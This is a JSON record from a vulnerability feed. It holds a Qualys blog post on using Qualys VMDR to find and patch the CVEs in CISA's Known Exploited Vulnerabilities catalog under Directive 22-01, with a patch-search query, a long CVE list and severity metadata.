"2021-04-06T18:47:57", "type": "threatpost", "title": "SAP Bugs Under Active Cyberattack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-5326", "CVE-2016-3976", "CVE-2016-9563", "CVE-2018-2380", "CVE-2020-6207", "CVE-2020-6287"], "modified": "2021-04-06T18:47:57", "id": "THREATPOST:4CFA3A7AC21D83FC03B1B74B2DA261BD", "href": "https://threatpost.com/sap-bugs-cyberattack-compromise/165265/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection &amp; Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:&quot;true&quot;_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}